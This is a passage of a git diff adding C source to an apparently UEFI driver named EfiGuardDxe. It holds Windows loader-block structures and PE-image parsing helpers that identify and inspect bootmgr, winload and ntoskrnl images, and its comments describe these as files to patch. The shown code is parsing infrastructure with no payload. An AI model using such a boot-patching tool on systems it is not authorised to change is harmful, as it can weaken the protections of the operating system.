Define the Core, TPM Core and Core Extensions driver lists. The + // lists are organized as follows: + // + // 1. Core Drivers: This list consists of drivers that ELAM drivers and + // 3rd party Core Extensions depend upon (e.g. WDF, CNG.sys). All + // drivers in this group should be MS-supplied and thus MS-signed. + // + // 2. ELAM drivers. This list consists of 3rd party ELAM drivers. These + // drivers need to be signed with ELAM certificate. + // + // 3. Core Extensions: This list consists of 3rd party drivers (viz. + // Platform Extensions and Tree drivers) that TPM Core drivers + // depend upon. These drivers need to be signed with Core Extension + // certificate. + // + // 4. TPM Core: This list consists of TPM driver and bus drivers (e.g. + // ACPI, PCI) that are necessary to enumerate TPM. All drivers in + // this group should be MS-supplied and thus MS-signed. + // + // 5. Boot Driver: This list contains the rest of the boot drivers. + // + LIST_ENTRY BootDriverListHead; + LIST_ENTRY EarlyLaunchListHead; + LIST_ENTRY CoreDriverListHead; + LIST_ENTRY CoreExtensionsDriverListHead; + LIST_ENTRY TpmCoreDriverListHead; + UINTN KernelStack; + UINTN Prcb; + UINTN Process; + UINTN Thread; + UINT32 KernelStackSize; + UINT32 RegistryLength; + VOID* RegistryBase; + PCONFIGURATION_COMPONENT_DATA ConfigurationRoot; + CHAR8* ArcBootDeviceName; + CHAR8* ArcHalDeviceName; + CHAR8* NtBootPathName; + CHAR8* NtHalPathName; + CHAR8* LoadOptions; + PNLS_DATA_BLOCK NlsData; + PARC_DISK_INFORMATION ArcDiskInformation; + PLOADER_PARAMETER_EXTENSION Extension; + union { + I386_LOADER_BLOCK I386; + ARM_LOADER_BLOCK Arm; + } u; + FIRMWARE_INFORMATION_LOADER_BLOCK FirmwareInformation; + + // + // Below added in 10.0.17134.0 + // + CHAR8* OsBootstatPathName; + CHAR8* ArcOSDataDeviceName; + CHAR8* ArcWindowsSysPartName; +} LOADER_PARAMETER_BLOCK, *PLOADER_PARAMETER_BLOCK; + + +#define LHB_SYSTEM_HIVE 0x01 +#define LHB_BOOT_PARTITION 0x02 +#define LHB_SYSTEM_PARTITION 0x04 +#define LHB_ELAM_HIVE 0x08 +#define LHB_MOUNT_VOLATILE 0x10 + +#define LHB_VALID_FLAGS (LHB_SYSTEM_HIVE | LHB_BOOT_PARTITION | LHB_SYSTEM_PARTITION | LHB_ELAM_HIVE | LHB_MOUNT_VOLATILE) + +typedef struct _LOADER_HIVE_BLOCK { + LIST_ENTRY Entry; + CHAR16* FilePath; + UINT32 Flags; + VOID* RegistryBase; + UINT32 RegistryLength; + CHAR16* RegistryName; + CHAR16* RegistryParent; + LOADER_HIVE_RECOVERY_INFO RecoveryInfo; +} LOADER_HIVE_BLOCK, *PLOADER_HIVE_BLOCK; + +// +// Source: ReactOS bl.h +// +typedef struct _BL_RETURN_ARGUMENTS { + UINT32 Version; + UINT32 Status; + UINT32 Flags; + UINT64 DataSize; + UINT64 DataPage; +} BL_RETURN_ARGUMENTS, *PBL_RETURN_ARGUMENTS; + +typedef struct _BL_BCD_OPTION { + UINT32 Type; + UINT32 DataOffset; + UINT32 DataSize; + UINT32 ListOffset; + UINT32 NextEntryOffset; + UINT32 Empty; +} BL_BCD_OPTION, *PBL_BCD_OPTION; + +typedef struct _BL_APPLICATION_ENTRY { + CHAR8 Signature[8]; + UINT32 Flags; + EFI_GUID Guid; + UINT32 Unknown[4]; + BL_BCD_OPTION BcdData; +} BL_APPLICATION_ENTRY, *PBL_APPLICATION_ENTRY; + +typedef struct _BL_LOADED_APPLICATION_ENTRY { + UINT32 Flags; + EFI_GUID Guid; + PBL_BCD_OPTION BcdData; +} BL_LOADED_APPLICATION_ENTRY, *PBL_LOADED_APPLICATION_ENTRY; diff --git a/EfiGuardDxe/ntdef.h b/EfiGuardDxe/ntdef.h new file mode 100644 index 0000000..62a38b8 --- /dev/null +++ b/EfiGuardDxe/ntdef.h @@ -0,0 +1,80 @@ +#pragma once + +// +// Minimal version of ntdef.h to avoid a dependency on the WDK +// + +// Ignore this file if either ntdef.h or winnt.h has already been included elsewhere +#if !defined(_NTDEF_) && !defined(_WINNT_) + +// DebugLib.h (re)defines _DEBUG without checking if it has already been defined. So get it now +#include <Library/DebugLib.h> + +// Get the correct CPU and (non-)debug defines for NT from UEFI if we don't have them already +#if defined(MDE_CPU_X64) + #if !defined(_WIN64) + #define _WIN64 + #endif + #if !defined(_AMD64_) + #define _AMD64_ + #endif +#elif defined(MDE_CPU_IA32) + #if !defined(_X86_) + #define _X86_ + #endif +#endif +#if defined(EFI_DEBUG) + #if !defined(_DEBUG) + #define _DEBUG + #endif + #if !defined(DBG) + #define DBG 1 + #endif +#endif +#if defined(MDEPKG_NDEBUG) + #if !defined(NDEBUG) + #define NDEBUG + #endif +#endif + +// Defines +#define ANYSIZE_ARRAY 1 +#define FIELD_OFFSET(Type, Field) ((INT32)(INTN)&(((Type *)0)->Field)) +#define MAKELANGID(Primary, Sub) ((((UINT16)(Sub)) << 10) | (UINT16)(Primary)) +#define LANG_NEUTRAL 0x00 +#define SUBLANG_NEUTRAL 0x00 +#define RTL_CONSTANT_STRING(s) \ +{ \ + (sizeof(s) - sizeof((s)[0])), \ + (sizeof(s)), \ + (s) \ +} +#define LOWORD(l) ((UINT16)(((UINTN)(l)) & 0xffff)) +#define HIWORD(l) ((UINT16)((((UINTN)(l)) >> 16) & 0xffff)) +#define LOBYTE(w) ((UINT8)(((UINTN)(w)) & 0xff)) +#define HIBYTE(w) ((UINT8)((((UINTN)(w)) >> 8) & 0xff)) + +// Typedefs +typedef INT32 NTSTATUS; + +typedef union _LARGE_INTEGER { + struct { + UINT32 LowPart; + INT32 HighPart; + } s; + struct { + UINT32 LowPart; + INT32 HighPart; + } u; + INT64 QuadPart; +} LARGE_INTEGER; + +typedef struct _UNICODE_STRING { + UINT16 Length; + UINT16 MaximumLength; + CHAR16* Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING *PUNICODE_STRING; +typedef CONST UNICODE_STRING *PCUNICODE_STRING; + +#endif // !defined(_NTDEF_) && !defined(_WINNT_) diff --git a/EfiGuardDxe/pe.c b/EfiGuardDxe/pe.c new file mode 100644 index 0000000..ef1edad --- /dev/null +++ b/EfiGuardDxe/pe.c @@ -0,0 +1,502 @@ +#include "EfiGuardDxe.h" + +#include <Library/BaseLib.h> +#include <Library/BaseMemoryLib.h> + + +#define LDR_IS_DATAFILE(x) (((UINTN)(x)) & (UINTN)1) +#define LDR_DATAFILE_TO_VIEW(x) ((VOID*)(((UINTN)(x)) & ~(UINTN)1)) + + +STATIC +BOOLEAN +EFIAPI +RtlIsCanonicalAddress( + UINTN Address + ) +{ +#if defined(MDE_CPU_IA32) + // 32-bit mode only supports 4GB max, so limits are not an issue + return TRUE; +#elif defined(MDE_CPU_X64) + // The most-significant 16 bits must be all 1 or all 0. (64 - 16) = 48bit linear address range. + // 0xFFFF800000000000 = Significant 16 bits set + // 0x0000800000000000 = 48th bit set + return (((Address & 0xFFFF800000000000) + 0x800000000000) & ~0x800000000000) == 0; +#endif +} + +PEFI_IMAGE_NT_HEADERS +EFIAPI +RtlpImageNtHeaderEx( + IN VOID* Base, + IN UINTN Size OPTIONAL + ) +{ + CONST BOOLEAN RangeCheck = Size > 0; + + if (RangeCheck && Size < sizeof(EFI_IMAGE_DOS_HEADER)) + return NULL; + if (((PEFI_IMAGE_DOS_HEADER)Base)->e_magic != EFI_IMAGE_DOS_SIGNATURE) + return NULL; + + CONST UINT32 e_lfanew = ((PEFI_IMAGE_DOS_HEADER)Base)->e_lfanew; + if (RangeCheck && + (e_lfanew >= Size || + e_lfanew >= (MAX_UINT32 - sizeof(EFI_IMAGE_NT_SIGNATURE) - sizeof(EFI_IMAGE_FILE_HEADER)) || + e_lfanew + sizeof(EFI_IMAGE_NT_SIGNATURE) + sizeof(EFI_IMAGE_FILE_HEADER) >= Size)) + { + return NULL; + } + + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = (PEFI_IMAGE_NT_HEADERS)(((UINT8*)Base) + e_lfanew); + + // On x64, verify this is a canonical address + if (!RtlIsCanonicalAddress((UINTN)NtHeaders)) + return NULL; + + if (NtHeaders->Signature != EFI_IMAGE_NT_SIGNATURE) + return NULL; + + return NtHeaders; +} + +INPUT_FILETYPE +EFIAPI +GetInputFileType( + IN UINT8* ImageBase, + IN UINTN ImageSize + ) +{ + // The non-EFI bootmgr starts with a 16 bit real mode stub instead of the standard MZ header + if (*(UINT16*)ImageBase == 0xD5E9) + return Bootmgr; + + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(ImageBase, ImageSize); + if (NtHeaders == NULL) + return Unknown; + + CONST UINT16 Subsystem = HEADER_FIELD(NtHeaders, Subsystem); + if (Subsystem == EFI_IMAGE_SUBSYSTEM_NATIVE) + return Ntoskrnl; + + if (Subsystem == EFI_IMAGE_SUBSYSTEM_EFI_APPLICATION) + { + // Of the Windows loaders, only bootmgfw.efi has this subsystem type. + // Check for the BCD Bootmgr GUID, { 9DEA862C-5CDD-4E70-ACC1-F32B344D4795 }, which is present in bootmgfw/bootmgr (and on Win >= 8 also winload.[exe|efi]) + CONST EFI_GUID BcdWindowsBootmgrGuid = { 0x9dea862c, 0x5cdd, 0x4e70, { 0xac, 0xc1, 0xf3, 0x2b, 0x34, 0x4d, 0x47, 0x95 } }; + for (UINT8* Address = ImageBase; Address < ImageBase + ImageSize - sizeof(BcdWindowsBootmgrGuid); Address += sizeof(VOID*)) + { + if (CompareGuid((CONST GUID*)Address, &BcdWindowsBootmgrGuid)) + { + return BootmgfwEfi; + } + } + + // Some other OS is being booted + return Unknown; + } + + // All remaining known possibilities have subsystem 0x10 (Windows boot application) + if (Subsystem != EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION) + { + DEBUG((DEBUG_WARN, "Unknown subsystem type 0x%02X.\r\n", Subsystem)); + return Unknown; + } + + // Brute force scan .rsrc to check if this is either winload.efi or bootmgr.efi. + // We've already eliminated bootmgr and bootmgfw.efi as candidates, so there will be no false positives + UINT32 Size = 0; + EFI_IMAGE_RESOURCE_DIRECTORY *ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*) + RtlpImageDirectoryEntryToDataEx(ImageBase, + TRUE, + EFI_IMAGE_DIRECTORY_ENTRY_RESOURCE, + &Size); + if (ResourceDirTable == NULL || Size == 0) + return Unknown; + + for (UINT8* Address = (UINT8*)ResourceDirTable; Address < ImageBase + ImageSize - sizeof(L"OSLOADER.XSL"); Address += sizeof(CHAR16)) + { + if (CompareMem(Address, L"BOOTMGR.XSL", sizeof(L"BOOTMGR.XSL") - sizeof(CHAR16)) == 0) + { + return BootmgrEfi; + } + if (CompareMem(Address, L"OSLOADER.XSL", sizeof(L"OSLOADER.XSL") - sizeof(CHAR16)) == 0) + { + return WinloadEfi; + } + } + + // Any remaining images that could slip through here (SecConfig.efi, winresume.efi) are not relevant for us + return Unknown; +} + +CONST CHAR16* +EFIAPI +FileTypeToString( + IN INPUT_FILETYPE FileType + ) +{ + switch (FileType) + { + case Bootmgr: + return L"bootmgr"; + case WinloadExe: + return L"winload.exe"; + case BootmgfwEfi: + return L"bootmgfw.efi"; + case BootmgrEfi: + return L"bootmgr.efi"; + case WinloadEfi: + return L"winload.efi"; + case Ntoskrnl: + return L"ntoskrnl.exe"; + case Unknown: + default: + return L"<unknown>"; + } +} + +VOID* +EFIAPI +GetProcedureAddress( + IN UINTN DllBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN CHAR8* RoutineName + ) +{ + if (DllBase == 0 || NtHeaders == NULL) + return NULL; + + // Get the export directory RVA and size + CONST PEFI_IMAGE_DATA_DIRECTORY ImageDirectories = NtHeaders->OptionalHeader.DataDirectory; + CONST UINT32 ExportDirRva = ImageDirectories[EFI_IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; + CONST UINT32 ExportDirSize = ImageDirectories[EFI_IMAGE_DIRECTORY_ENTRY_EXPORT].Size; + + // Read the export directory + CONST PEFI_IMAGE_EXPORT_DIRECTORY ExportDirectory = (PEFI_IMAGE_EXPORT_DIRECTORY)(DllBase + ExportDirRva); + CONST UINT32* AddressOfFunctions = (UINT32*)(DllBase + ExportDirectory->AddressOfFunctions); + CONST UINT16* AddressOfNameOrdinals = (UINT16*)(DllBase + ExportDirectory->AddressOfNameOrdinals); + CONST UINT32* AddressOfNames = (UINT32*)(DllBase + ExportDirectory->AddressOfNames); + + // Look up the import name in the name table using a binary search + INT32 Low = 0; + INT32 Middle = 0; + INT32 High = ExportDirectory->NumberOfNames - 1; + + while (High >= Low) + { + // Compute the next probe index and compare the import name + Middle = (Low + High) >> 1; + CONST INTN Result = AsciiStrCmp(RoutineName, (CHAR8*)(DllBase + AddressOfNames[Middle])); + if (Result < 0) + High = Middle - 1; + else if (Result > 0) + Low = Middle + 1; + else + break; + } + + // If the high index is less than the low index, then a matching table entry + // was not found. Otherwise, get the ordinal number from the ordinal table + if (High < Low || Middle >= (INT32)ExportDirectory->NumberOfFunctions) + return NULL; + CONST UINT32 FunctionRva = AddressOfFunctions[AddressOfNameOrdinals[Middle]]; + if (FunctionRva >= ExportDirRva && FunctionRva < ExportDirRva + ExportDirSize) + return NULL; // Ignore forward exports + + return (VOID*)(DllBase + FunctionRva); +} + +EFI_STATUS +EFIAPI +FindIATAddressForImport( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN CONST CHAR8* ImportDllName, + IN CONST CHAR8* FunctionName, + OUT VOID **FunctionIATAddress + ) +{ + *FunctionIATAddress = NULL; + + // Get the import descriptor table + UINT32 ImportDirSize; + CONST PIMAGE_IMPORT_DESCRIPTOR DescriptorTable = (PIMAGE_IMPORT_DESCRIPTOR) + RtlpImageDirectoryEntryToDataEx(ImageBase, + TRUE, + EFI_IMAGE_DIRECTORY_ENTRY_IMPORT, + &ImportDirSize); + if (ImportDirSize == 0 || DescriptorTable == NULL) + return EFI_NOT_FOUND; + + // Count the number of DLL import descriptors + PIMAGE_IMPORT_DESCRIPTOR Entry = DescriptorTable; + UINT32 DllCount; + for (DllCount = 0; Entry->u.OriginalFirstThunk != 0; ++DllCount) + { + Entry = (PIMAGE_IMPORT_DESCRIPTOR)((UINTN)(Entry) + + sizeof(IMAGE_IMPORT_DESCRIPTOR)); + } + + // Iterate over the import descriptors + for (UINT32 i = 0; i < DllCount; ++i) + { + // Is this the import descriptor for our DLL? + CONST PIMAGE_IMPORT_DESCRIPTOR Descriptor = &DescriptorTable[i]; + CONST CHAR8* DllName = (CHAR8*)((UINTN)ImageBase + Descriptor->Name); + if (DllName == NULL || AsciiStriCmp(DllName, ImportDllName) != 0) + continue; // No - skip + + // Get the thunk data using the OFT if available, otherwise use the FT + CONST VOID* ThunkData = (VOID*)((UINTN)ImageBase + + (Descriptor->u.OriginalFirstThunk != 0 + ? Descriptor->u.OriginalFirstThunk + : Descriptor->FirstThunk)); + + // Iterate over the function imports + if (IMAGE64(NtHeaders)) + { + PIMAGE_THUNK_DATA64 ThunkEntry = (PIMAGE_THUNK_DATA64)ThunkData; + + for (UINT32 j = 0; ThunkEntry->u1.AddressOfData > 0; ++j) + { + CONST PIMAGE_IMPORT_BY_NAME ImportByName = (PIMAGE_IMPORT_BY_NAME)( + (UINTN)ImageBase + ThunkEntry->u1.AddressOfData); + + if ((ThunkEntry->u1.Ordinal & IMAGE_ORDINAL_FLAG64) == 0 && // Ignore imports by ordinal + ImportByName->Name[0] != '\0' && + AsciiStriCmp(ImportByName->Name, FunctionName) == 0) + { + // Found the import + CONST UINT32 Rva = Descriptor->FirstThunk + j * sizeof(UINTN); + VOID* Va = (VOID*)((UINTN)(ImageBase) + Rva); + *FunctionIATAddress = Va; + return EFI_SUCCESS; + } + + ThunkEntry = (PIMAGE_THUNK_DATA64)((UINTN)ThunkEntry + sizeof(IMAGE_THUNK_DATA64)); + } + } + else + { + PIMAGE_THUNK_DATA32 ThunkEntry = (PIMAGE_THUNK_DATA32)ThunkData; + + for (UINT32 j = 0; ThunkEntry->u1.AddressOfData > 0; ++j) + { + CONST PIMAGE_IMPORT_BY_NAME ImportByName = (PIMAGE_IMPORT_BY_NAME)( + (UINTN)ImageBase + ThunkEntry->u1.AddressOfData); + + if ((ThunkEntry->u1.Ordinal & IMAGE_ORDINAL_FLAG32) == 0 && // Ignore imports by ordinal + ImportByName->Name[0] != '\0' && + AsciiStriCmp(ImportByName->Name, FunctionName) == 0) + { + // Found the import + CONST UINT32 Rva = Descriptor->FirstThunk + j * sizeof(UINTN); + VOID* Va = (VOID*)((UINTN)ImageBase + Rva); + *FunctionIATAddress = Va; + return EFI_SUCCESS; + } + + ThunkEntry = (PIMAGE_THUNK_DATA32)((UINTN)ThunkEntry + sizeof(IMAGE_THUNK_DATA32)); + } + } + } + return EFI_NOT_FOUND; +} + + +UINT32 +EFIAPI +RvaToOffset( + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN UINT32 Rva + ) +{ + PEFI_IMAGE_SECTION_HEADER SectionHeaders = IMAGE_FIRST_SECTION(NtHeaders); + CONST UINT16 NumberOfSections = NtHeaders->FileHeader.NumberOfSections; + UINT32 Result = 0; + for (UINT16 i = 0; i < NumberOfSections; ++i) + { + if (SectionHeaders->VirtualAddress <= Rva && + SectionHeaders->VirtualAddress + SectionHeaders->Misc.VirtualSize > Rva) + { + Result = Rva - SectionHeaders->VirtualAddress + + SectionHeaders->PointerToRawData; + break; + } + SectionHeaders++; + } + return Result; +} + +// The kernel and ntdll divide this into [ RtlImageDirectoryEntryToData -> RtlpImageDirectoryEntryToData -> +// { RtlpImageDirectoryEntryToData32 / RtlpImageDirectoryEntryToData64 } -> RtlpAddressInSectionTable -> +// RtlpSectionTableFromVirtualAddress ], but with some macro help and RvaToOffset it can be limited to one function +VOID* +EFIAPI +RtlpImageDirectoryEntryToDataEx( + IN VOID* Base, + IN BOOLEAN MappedAsImage, + IN UINT16 DirectoryEntry, + OUT UINT32 *Size + ) +{ + if (LDR_IS_DATAFILE(Base)) + { + Base = LDR_DATAFILE_TO_VIEW(Base); + MappedAsImage = FALSE; + } + + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(Base, 0); + if (NtHeaders == NULL) + return NULL; + + if (DirectoryEntry >= HEADER_FIELD(NtHeaders, NumberOfRvaAndSizes)) + return NULL; + + CONST PEFI_IMAGE_DATA_DIRECTORY Directories = HEADER_FIELD(NtHeaders, DataDirectory); + CONST UINT32 Rva = Directories[DirectoryEntry].VirtualAddress; + if (Rva == 0) + return NULL; + + // Omitted: check for illegal UM <-> KM boundary crossing as it is N/A for us + + *Size = Directories[DirectoryEntry].Size; + if (MappedAsImage || Rva < HEADER_FIELD(NtHeaders, SizeOfHeaders)) + { + return (VOID*)((UINT8*)(Base) + Rva); + } + + return (VOID*)((UINT8*)(Base) + RvaToOffset(NtHeaders, Rva)); +} + +// Similar to LdrFindResource_U + LdrAccessResource combined, with some shortcuts for size optimization: +// - Only IDs are supported for type/name/language, not strings. Named entries ("MUI", "RCDATA", ...) are ignored. +// - Only images are supported, not mapped data files (e.g. LoadLibrary(..., LOAD_LIBRARY_AS_DATAFILE) data). +// - Language ID matching is greatly simplified. Either supply 0 (first entry wins) or an exact match ID. There are no fallbacks for similar languages, user preferences, etc. +// - The path length is assumed to always be 3: Type -> Name -> Language, with a data entry as leaf node. +// +// NB: The output will be a direct pointer to the resource data, which on Windows usually means it is read only, and on UEFI +// means writing to it is probably not what you want. This is the same behaviour as LdrAccessResource() but easy to forget. +// If you need to modify the data or unload the original image at some point, copy the data first. +EFI_STATUS +EFIAPI +FindResourceDataById( + IN VOID* ImageBase, + IN UINT16 TypeId, + IN UINT16 NameId, + IN UINT16 LanguageId OPTIONAL, + OUT VOID** ResourceData OPTIONAL, + OUT UINT32* ResourceSize + ) +{ + if (ResourceData != NULL) + *ResourceData = NULL; + *ResourceSize = 0; + + ASSERT((!LDR_IS_DATAFILE(ImageBase))); + + UINT32 Size = 0; + EFI_IMAGE_RESOURCE_DIRECTORY *ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*) + RtlpImageDirectoryEntryToDataEx(ImageBase, + TRUE, + EFI_IMAGE_DIRECTORY_ENTRY_RESOURCE, + &Size); + if (ResourceDirTable == NULL || Size == 0) + return EFI_NOT_FOUND; + + CONST UINT8* ResourceDirVa = (UINT8*)ResourceDirTable; + EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY *DirEntry = NULL; + for (UINT16 i = ResourceDirTable->NumberOfNamedEntries; i < ResourceDirTable->NumberOfNamedEntries + ResourceDirTable->NumberOfIdEntries; ++i) + { + DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY))); + if ((BOOLEAN)DirEntry->u1.s.NameIsString) + continue; + if (DirEntry->u1.Id == TypeId && DirEntry->u2.s.DataIsDirectory) + break; + } + if (DirEntry == NULL || DirEntry->u1.Id != TypeId) + return EFI_NOT_FOUND; + + ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*)(ResourceDirVa + DirEntry->u2.s.OffsetToDirectory); + DirEntry = NULL; + for (UINT16 i = ResourceDirTable->NumberOfNamedEntries; i < ResourceDirTable->NumberOfNamedEntries + ResourceDirTable->NumberOfIdEntries; ++i) + { + DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY))); + if ((BOOLEAN)DirEntry->u1.s.NameIsString) + continue; + if (DirEntry->u1.Id == NameId && DirEntry->u2.s.DataIsDirectory) + break; + } + if (DirEntry == NULL || DirEntry->u1.Id != NameId) + return EFI_NOT_FOUND; + + ResourceDirTable = (EFI_IMAGE_RESOURCE_DIRECTORY*)(ResourceDirVa + DirEntry->u2.s.OffsetToDirectory); + DirEntry = NULL; + for (UINT16 i = ResourceDirTable->NumberOfNamedEntries; i < ResourceDirTable->NumberOfNamedEntries + ResourceDirTable->NumberOfIdEntries; ++i) + { + DirEntry = (EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY*)((UINT8*)ResourceDirTable + sizeof(EFI_IMAGE_RESOURCE_DIRECTORY) + (i * sizeof(EFI_IMAGE_RESOURCE_DIRECTORY_ENTRY))); + if ((BOOLEAN)DirEntry->u1.s.NameIsString) + continue; + if ((LanguageId == 0 || DirEntry->u1.Id == LanguageId) && !DirEntry->u2.s.DataIsDirectory) + break; + } + if (DirEntry == NULL || (LanguageId != 0 && DirEntry->u1.Id != LanguageId)) + return EFI_INVALID_LANGUAGE; + + EFI_IMAGE_RESOURCE_DATA_ENTRY *DataEntry = (EFI_IMAGE_RESOURCE_DATA_ENTRY*)(ResourceDirVa + DirEntry->u2.OffsetToData); + if (ResourceData != NULL) + *ResourceData = (VOID*)((UINT8*)ImageBase + DataEntry->OffsetToData); + *ResourceSize = DataEntry->Size; + + return EFI_SUCCESS; +} + +EFI_STATUS +EFIAPI +GetPeFileVersionInfo( + IN VOID* ImageBase, + OUT UINT16* MajorVersion OPTIONAL, + OUT UINT16* MinorVersion OPTIONAL, + OUT UINT16* BuildNumber OPTIONAL, + OUT UINT16* Revision OPTIONAL, + OUT UINT32* FileFlags OPTIONAL + ) +{ + // Search the PE file's resource directory (if it exists) for a version info entry + VS_VERSIONINFO *VersionResource; + UINT32 VersionResourceSize; + CONST EFI_STATUS Status = FindResourceDataById(ImageBase, + RT_VERSION, + VS_VERSION_INFO, + MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), + (VOID**)&VersionResource, + &VersionResourceSize); + if (EFI_ERROR(Status)) + { + DEBUG((DEBUG_ERROR, "GetPeFileVersionInfo: FindResourceDataById returned %llx\r\n", Status)); + return Status; // Either no resource directory or no version info. Perhaps ASSERT() here as the files we patch should always have them + } + + if (VersionResourceSize < sizeof(VS_VERSIONINFO) || + StrnCmp(VersionResource->Name, L"VS_VERSION_INFO", (sizeof(L"VS_VERSION_INFO") / sizeof(CHAR16)) - 1) != 0 || + VersionResource->FixedFileInfo.dwSignature != 0xFEEF04BD) + { + DEBUG((DEBUG_ERROR, "GetPeFileVersionInfo: RESOURCE_VERSION_DATA at 0x%p is not valid\r\n", (VOID*)VersionResource)); + return EFI_NOT_FOUND; + } + + if (MajorVersion != NULL) + *MajorVersion = HIWORD(VersionResource->FixedFileInfo.dwFileVersionMS); + if (MinorVersion != NULL) + *MinorVersion = LOWORD(VersionResource->FixedFileInfo.dwFileVersionMS); + if (BuildNumber != NULL) + *BuildNumber = HIWORD(VersionResource->FixedFileInfo.dwFileVersionLS); + if (Revision != NULL) + *Revision = LOWORD(VersionResource->FixedFileInfo.dwFileVersionLS); + if (FileFlags != NULL) + *FileFlags = (VersionResource->FixedFileInfo.dwFileFlags & VersionResource->FixedFileInfo.dwFileFlagsMask); + + return EFI_SUCCESS; +} diff --git a/EfiGuardDxe/pe.h b/EfiGuardDxe/pe.h new file mode 100644 index 0000000..8c5f41c --- /dev/null +++ b/EfiGuardDxe/pe.h @@ -0,0 +1,252 @@ +#pragma once + +#include <IndustryStandard/PeImage.h> + + +// +// Typedefs +// +typedef EFI_IMAGE_NT_HEADERS32 *PEFI_IMAGE_NT_HEADERS32; +typedef EFI_IMAGE_NT_HEADERS64 *PEFI_IMAGE_NT_HEADERS64; + +#if defined(MDE_CPU_X64) +typedef EFI_IMAGE_NT_HEADERS64 EFI_IMAGE_NT_HEADERS, *PEFI_IMAGE_NT_HEADERS; +#elif defined(MDE_CPU_IA32) +typedef EFI_IMAGE_NT_HEADERS32 EFI_IMAGE_NT_HEADERS, *PEFI_IMAGE_NT_HEADERS; +#endif + +typedef EFI_IMAGE_DOS_HEADER *PEFI_IMAGE_DOS_HEADER; +typedef EFI_IMAGE_FILE_HEADER *PEFI_IMAGE_FILE_HEADER; +typedef EFI_IMAGE_SECTION_HEADER *PEFI_IMAGE_SECTION_HEADER; +typedef EFI_IMAGE_DATA_DIRECTORY *PEFI_IMAGE_DATA_DIRECTORY; +typedef EFI_IMAGE_EXPORT_DIRECTORY *PEFI_IMAGE_EXPORT_DIRECTORY; + +// ACHTUNG: DO NOT USE - EDK2 people didn't read the PE docs re: these it seems. Not very surprising since EFI files don't tend to use imports +//typedef EFI_IMAGE_IMPORT_BY_NAME *PEFI_IMAGE_IMPORT_BY_NAME; +//typedef EFI_IMAGE_THUNK_DATA *PEFI_IMAGE_THUNK_DATA; +//typedef EFI_IMAGE_IMPORT_DESCRIPTOR *PEFI_IMAGE_IMPORT_DESCRIPTOR; + + +// +// Defines +// +#define EFI_IMAGE_SUBSYSTEM_NATIVE 1 +#define EFI_IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16 + +#define IMAGE_ORDINAL_FLAG64 (0x8000000000000000) +#define IMAGE_ORDINAL_FLAG32 (0x80000000) + +#define RT_VERSION 16 +#define VS_VERSION_INFO 1 +#define VS_FF_DEBUG (0x00000001L) + +#define IMAGE32(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == EFI_IMAGE_NT_OPTIONAL_HDR32_MAGIC) +#define IMAGE64(NtHeaders) ((NtHeaders)->OptionalHeader.Magic == EFI_IMAGE_NT_OPTIONAL_HDR64_MAGIC) + +#define HEADER_FIELD(NtHeaders, Field) (IMAGE64(NtHeaders) \ + ? ((PEFI_IMAGE_NT_HEADERS64)(NtHeaders))->OptionalHeader.Field \ + : ((PEFI_IMAGE_NT_HEADERS32)(NtHeaders))->OptionalHeader.Field) + +#define IMAGE_FIRST_SECTION(NtHeaders) ((PEFI_IMAGE_SECTION_HEADER) \ + ((UINTN)(NtHeaders) + \ + FIELD_OFFSET(EFI_IMAGE_NT_HEADERS, OptionalHeader) + \ + ((NtHeaders))->FileHeader.SizeOfOptionalHeader)) + + +// +// Type of file to patch +// +typedef enum _INPUT_FILETYPE +{ + Unknown, + + // BIOS boot manager/loader + Bootmgr, // Unsupported + WinloadExe, // Unsupported + + // EFI boot manager/loader + BootmgfwEfi, + BootmgrEfi, + WinloadEfi, + + // Kernel + Ntoskrnl +} INPUT_FILETYPE; + + +// +// Define (correct) import descriptor types and use their standard NT names because the EFI prefixed ones are taken +// + +#pragma pack(push, 4) // Use 4 byte packing + +typedef struct _IMAGE_IMPORT_BY_NAME +{ + UINT16 Hint; + CHAR8 Name[1]; +} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; + +#pragma pack(pop) + +#pragma pack(push, 8) // 8 byte alignment for the 64 bit IAT + +typedef struct _IMAGE_THUNK_DATA64 +{ + union + { + UINT64 ForwarderString; // UINT8* + UINT64 Function; // UINT32* + UINT64 Ordinal; + UINT64 AddressOfData; // PIMAGE_IMPORT_BY_NAME + } u1; +} IMAGE_THUNK_DATA64, *PIMAGE_THUNK_DATA64; + +#pragma pack(pop) + +#pragma pack(push, 4) // Revert to 4 byte packing + +typedef struct _IMAGE_THUNK_DATA32 +{ + union + { + UINT32 ForwarderString; // UINT8* + UINT32 Function; // UINT32* + UINT32 Ordinal; + UINT32 AddressOfData; // PIMAGE_IMPORT_BY_NAME + } u1; +} IMAGE_THUNK_DATA32, *PIMAGE_THUNK_DATA32; + +typedef struct _IMAGE_IMPORT_DESCRIPTOR +{ + union + { + UINT32 Characteristics; // 0 for terminating null import descriptor + UINT32 OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) + } u; + UINT32 TimeDateStamp; // 0 if not bound, + // -1 if bound, and real date\time stamp + // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new 